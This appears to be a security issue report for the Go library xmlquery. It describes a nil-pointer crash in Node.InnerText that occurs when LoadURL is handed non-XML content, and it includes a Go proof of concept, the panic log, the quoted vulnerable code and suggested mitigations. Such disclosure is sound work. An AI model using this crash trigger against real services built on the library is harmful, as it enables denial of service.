Denial-of-Service (SIGSEGV) at xmlquery.(*Node).InnerText

[dwisiswant0]

Summary

The LoadURL function allows all response types/formats to be parsed (other than XML), so that it can proceed to the next process (e.g. xmlquery.(*Node).InnerText from xmlquery.FindOne) without validation.

Description

This security issue affects all xmlquery version.

Steps to Reproduce

package main

import (
	"fmt"
	"github.com/antchfx/xmlquery"
)

func main() {
	wadl, err := xmlquery.LoadURL("https://httpbin.org/get")
	if err != nil {
		panic(err)
	}

	attr := xmlquery.FindOne(wadl, "//application/@xmlns")
	fmt.Println(attr.InnerText())
}

The logs will look similar to the following:

panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x28 pc=0x6a179a]

goroutine 1 [running]:
github.com/antchfx/xmlquery.(*Node).InnerText.func1(0xc00032e2d0, 0x0)
        /home/dw1/.go/src/github.com/antchfx/xmlquery/node.go:55 +0x2a
github.com/antchfx/xmlquery.(*Node).InnerText(0x0, 0x746b67, 0x14)
        /home/dw1/.go/src/github.com/antchfx/xmlquery/node.go:67 +0x84
main.main()
        /tmp/xmlquery.go:15 +0xa0
exit status 2

Vulnerable code:

xmlquery/node.go

Lines 50 to 62 in 64ca73d

	switch n.Type {
	case TextNode, CharDataNode:
	buf.WriteString(n.Data)
	case CommentNode:
	default:
	for child := n.FirstChild; child != nil; child = child.NextSibling {
	output(buf, child)
	}
	}
	}
	var buf bytes.Buffer
	output(&buf, n)

Recommended Mitigations

• Validates the response from URLs loaded in LoadURL, if not XML format; then returns an error.
• Using xml.Unmarshal (only to check the validity of the XML content).